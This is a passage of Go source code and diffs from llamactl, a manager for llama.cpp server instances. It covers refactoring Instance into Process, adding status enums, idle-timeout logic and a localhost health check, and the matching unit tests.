mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, initialOptions, mockOnStatusChange)
// Update options
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
inst.SetOptions(newOptions)
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestGetProxy(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Get proxy for the first time
proxy1, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]any
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["status"] != "stopped" {
t.Errorf("Expected status 'stopped', got %v", result["status"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
// Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"status": "running",
"options": {
"auto_restart": false,
"max_restarts": 5,
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"port": 8080
}
}
}`
var inst instance.Process
err := json.Unmarshal([]byte(jsonData), &inst)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if !inst.IsRunning() {
t.Error("Expected status to be running")
}
opts := inst.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
}
if opts.LlamaServerOptions == nil {
t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "valid positive values",
maxRestarts: testutil.IntPtr(10),
restartDelay: testutil.IntPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: testutil.IntPtr(0),
restartDelay: testutil.IntPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: testutil.IntPtr(-5),
restartDelay: testutil.IntPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test", globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
})
}
}

View File

@@ -1,9 +1,10 @@
package llamactl package instance
import ( import (
"context" "context"
"fmt" "fmt"
"log" "log"
"net/http"
"os/exec" "os/exec"
"runtime" "runtime"
"syscall" "syscall"
@@ -11,11 +12,11 @@ import (
) )
// Start starts the llama server instance and returns an error if it fails. // Start starts the llama server instance and returns an error if it fails.
func (i *Instance) Start() error { func (i *Process) Start() error {
i.mu.Lock() i.mu.Lock()
defer i.mu.Unlock() defer i.mu.Unlock()
if i.Running { if i.IsRunning() {
return fmt.Errorf("instance %s is already running", i.Name) return fmt.Errorf("instance %s is already running", i.Name)
} }
@@ -30,13 +31,15 @@ func (i *Instance) Start() error {
i.restarts = 0 i.restarts = 0
} }
// Initialize last request time to current time when starting
i.lastRequestTime.Store(i.timeProvider.Now().Unix())
// Create log files // Create log files
if err := i.logger.Create(); err != nil { if err := i.logger.Create(); err != nil {
return fmt.Errorf("failed to create log files: %w", err) return fmt.Errorf("failed to create log files: %w", err)
} }
args := i.options.BuildCommandArgs() args := i.options.BuildCommandArgs()
i.ctx, i.cancel = context.WithCancel(context.Background()) i.ctx, i.cancel = context.WithCancel(context.Background())
i.cmd = exec.CommandContext(i.ctx, "llama-server", args...) i.cmd = exec.CommandContext(i.ctx, "llama-server", args...)
@@ -61,7 +64,7 @@ func (i *Instance) Start() error {
return fmt.Errorf("failed to start instance %s: %w", i.Name, err) return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
} }
i.Running = true i.SetStatus(Running)
// Create channel for monitor completion signaling // Create channel for monitor completion signaling
i.monitorDone = make(chan struct{}) i.monitorDone = make(chan struct{})
@@ -75,10 +78,10 @@ func (i *Instance) Start() error {
} }
// Stop terminates the subprocess // Stop terminates the subprocess
func (i *Instance) Stop() error { func (i *Process) Stop() error {
i.mu.Lock() i.mu.Lock()
if !i.Running { if !i.IsRunning() {
// Even if not running, cancel any pending restart // Even if not running, cancel any pending restart
if i.restartCancel != nil { if i.restartCancel != nil {
i.restartCancel() i.restartCancel()
@@ -95,8 +98,8 @@ func (i *Instance) Stop() error {
i.restartCancel = nil i.restartCancel = nil
} }
// Set running to false first to signal intentional stop // Set status to stopped first to signal intentional stop
i.Running = false i.SetStatus(Stopped)
// Clean up the proxy // Clean up the proxy
i.proxy = nil i.proxy = nil
@@ -106,19 +109,25 @@ func (i *Instance) Stop() error {
i.mu.Unlock() i.mu.Unlock()
// Stop the process with SIGINT // Stop the process with SIGINT if cmd exists
if i.cmd.Process != nil { if i.cmd != nil && i.cmd.Process != nil {
if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil { if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err) log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
} }
} }
// If no process exists, we can return immediately
if i.cmd == nil || monitorDone == nil {
i.logger.Close()
return nil
}
select { select {
case <-monitorDone: case <-monitorDone:
// Process exited normally // Process exited normally
case <-time.After(30 * time.Second): case <-time.After(30 * time.Second):
// Force kill if it doesn't exit within 30 seconds // Force kill if it doesn't exit within 30 seconds
if i.cmd.Process != nil { if i.cmd != nil && i.cmd.Process != nil {
killErr := i.cmd.Process.Kill() killErr := i.cmd.Process.Kill()
if killErr != nil { if killErr != nil {
log.Printf("Failed to force kill instance %s: %v", i.Name, killErr) log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
@@ -140,7 +149,85 @@ func (i *Instance) Stop() error {
return nil return nil
} }
func (i *Instance) monitorProcess() { func (i *Process) LastRequestTime() int64 {
return i.lastRequestTime.Load()
}
func (i *Process) WaitForHealthy(timeout int) error {
if !i.IsRunning() {
return fmt.Errorf("instance %s is not running", i.Name)
}
if timeout <= 0 {
timeout = 30 // Default to 30 seconds if no timeout is specified
}
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
defer cancel()
// Get instance options to build the health check URL
opts := i.GetOptions()
if opts == nil {
return fmt.Errorf("instance %s has no options set", i.Name)
}
// Build the health check URL directly
var host string
var port int
switch opts.BackendType {
case "llama-cpp":
host = opts.LlamaServerOptions.Host
port = opts.LlamaServerOptions.Port
}
if host == "" {
host = "localhost"
}
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
// Create a dedicated HTTP client for health checks
client := &http.Client{
Timeout: 5 * time.Second, // 5 second timeout per request
}
// Helper function to check health directly
checkHealth := func() bool {
req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
if err != nil {
return false
}
resp, err := client.Do(req)
if err != nil {
return false
}
defer resp.Body.Close()
return resp.StatusCode == http.StatusOK
}
// Try immediate check first
if checkHealth() {
return nil // Instance is healthy
}
// If immediate check failed, start polling
ticker := time.NewTicker(1 * time.Second)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
case <-ticker.C:
if checkHealth() {
return nil // Instance is healthy
}
// Continue polling
}
}
}
func (i *Process) monitorProcess() {
defer func() { defer func() {
i.mu.Lock() i.mu.Lock()
if i.monitorDone != nil { if i.monitorDone != nil {
@@ -155,12 +242,12 @@ func (i *Instance) monitorProcess() {
i.mu.Lock() i.mu.Lock()
// Check if the instance was intentionally stopped // Check if the instance was intentionally stopped
if !i.Running { if !i.IsRunning() {
i.mu.Unlock() i.mu.Unlock()
return return
} }
i.Running = false i.SetStatus(Stopped)
i.logger.Close() i.logger.Close()
// Cancel any existing restart context since we're handling a new exit // Cancel any existing restart context since we're handling a new exit
@@ -181,10 +268,11 @@ func (i *Instance) monitorProcess() {
} }
// handleRestart manages the restart process while holding the lock // handleRestart manages the restart process while holding the lock
func (i *Instance) handleRestart() { func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters // Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions() shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart { if !shouldRestart {
i.SetStatus(Failed)
i.mu.Unlock() i.mu.Unlock()
return return
} }
@@ -223,7 +311,7 @@ func (i *Instance) handleRestart() {
} }
// validateRestartConditions checks if the instance should be restarted and returns the parameters // validateRestartConditions checks if the instance should be restarted and returns the parameters
func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) { func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
if i.options == nil { if i.options == nil {
log.Printf("Instance %s not restarting: options are nil", i.Name) log.Printf("Instance %s not restarting: options are nil", i.Name)
return false, 0, 0 return false, 0, 0

View File

@@ -1,4 +1,4 @@
package llamactl package instance
import ( import (
"bufio" "bufio"
@@ -52,7 +52,7 @@ func (i *InstanceLogger) Create() error {
} }
// GetLogs retrieves the last n lines of logs from the instance // GetLogs retrieves the last n lines of logs from the instance
func (i *Instance) GetLogs(num_lines int) (string, error) { func (i *Process) GetLogs(num_lines int) (string, error) {
i.mu.RLock() i.mu.RLock()
logFileName := i.logger.logFilePath logFileName := i.logger.logFilePath
i.mu.RUnlock() i.mu.RUnlock()

141
pkg/instance/options.go Normal file
View File

@@ -0,0 +1,141 @@
package instance
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"log"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"` // seconds
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// LlamaServerOptions contains the options for the llama server
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := &struct {
*Alias
}{
Alias: (*Alias)(c),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := struct {
*Alias
}{
Alias: (*Alias)(c),
}
// Convert LlamaServerOptions back to BackendOptions map for JSON
if c.BackendType == backends.BackendTypeLlamaCpp && c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
return json.Marshal(aux)
}
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
*c.MaxRestarts = 0
}
if c.RestartDelay != nil && *c.RestartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, *c.RestartDelay)
*c.RestartDelay = 0
}
if c.IdleTimeout != nil && *c.IdleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, *c.IdleTimeout)
*c.IdleTimeout = 0
}
// Apply defaults from global settings for nil fields
if globalSettings != nil {
if c.AutoRestart == nil {
c.AutoRestart = &globalSettings.DefaultAutoRestart
}
if c.MaxRestarts == nil {
c.MaxRestarts = &globalSettings.DefaultMaxRestarts
}
if c.RestartDelay == nil {
c.RestartDelay = &globalSettings.DefaultRestartDelay
}
if c.OnDemandStart == nil {
c.OnDemandStart = &globalSettings.DefaultOnDemandStart
}
if c.IdleTimeout == nil {
defaultIdleTimeout := 0
c.IdleTimeout = &defaultIdleTimeout
}
}
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs() []string {
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
return c.LlamaServerOptions.BuildCommandArgs()
}
}
return []string{}
}

View File

@@ -1,6 +1,6 @@
//go:build !windows //go:build !windows
package llamactl package instance
import ( import (
"os/exec" "os/exec"

View File

@@ -1,6 +1,6 @@
//go:build windows //go:build windows
package llamactl package instance
import "os/exec" import "os/exec"

70
pkg/instance/status.go Normal file
View File

@@ -0,0 +1,70 @@
package instance
import (
"encoding/json"
"log"
)
// Enum for instance status
type InstanceStatus int
const (
Stopped InstanceStatus = iota
Running
Failed
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
}
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
}
status, ok := nameToStatus[str]
if !ok {
log.Printf("Unknown instance status: %s", str)
status = Stopped // Default to Stopped on unknown status
}
*s = status
return nil
}

28
pkg/instance/timeout.go Normal file
View File

@@ -0,0 +1,28 @@
package instance
// UpdateLastRequestTime updates the last request access time for the instance via proxy
func (i *Process) UpdateLastRequestTime() {
i.mu.Lock()
defer i.mu.Unlock()
lastRequestTime := i.timeProvider.Now().Unix()
i.lastRequestTime.Store(lastRequestTime)
}
func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}
// Check if the last request time exceeds the idle timeout
lastRequest := i.lastRequestTime.Load()
idleTimeoutMinutes := *i.options.IdleTimeout
// Convert timeout from minutes to seconds for comparison
idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
return (i.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
}

View File

@@ -0,0 +1,220 @@
package instance_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"sync/atomic"
"testing"
"time"
)
// MockTimeProvider implements TimeProvider for testing
type MockTimeProvider struct {
currentTime atomic.Int64 // Unix timestamp
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
m := &MockTimeProvider{}
m.currentTime.Store(t.Unix())
return m
}
func (m *MockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime.Load(), 0)
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.currentTime.Store(t.Unix())
}
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
idleTimeout *int
}{
{"nil timeout", nil},
{"zero timeout", testutil.IntPtr(0)},
{"negative timeout", testutil.IntPtr(-5)},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Simulate running state
inst.SetStatus(instance.Running)
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
}
})
}
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now
inst.UpdateLastRequestTime()
// Should not timeout immediately
if inst.ShouldTimeout() {
t.Error("Instance should not timeout when last request was recent")
}
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.SetTime(time.Now().Add(2 * time.Minute))
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when last request exceeds idle timeout")
}
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
inputTimeout *int
expectedTimeout int
}{
{"default value when nil", nil, 0},
{"positive value", testutil.IntPtr(10), 10},
{"zero value", testutil.IntPtr(0), 0},
{"negative value gets corrected", testutil.IntPtr(-5), 0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {
t.Errorf("Expected IdleTimeout %d, got %v", tt.expectedTimeout, opts.IdleTimeout)
}
})
}
}

View File

@@ -1,442 +0,0 @@
package llamactl_test
import (
"encoding/json"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstance(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &llamactl.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Test with invalid negative values
invalidMaxRestarts := -5
invalidRestartDelay := -10
options := &llamactl.CreateInstanceOptions{
MaxRestarts: &invalidMaxRestarts,
RestartDelay: &invalidRestartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that negative values were corrected to 0
if opts.MaxRestarts == nil || *opts.MaxRestarts != 0 {
t.Errorf("Expected MaxRestarts to be corrected to 0, got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 0 {
t.Errorf("Expected RestartDelay to be corrected to 0, got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions)
// Update options
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
instance.SetOptions(newOptions)
opts := instance.GetOptions()
if opts.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
}
if opts.Port != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port)
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestSetOptions_NilOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
originalOptions := instance.GetOptions()
// Try to set nil options
instance.SetOptions(nil)
// Options should remain unchanged
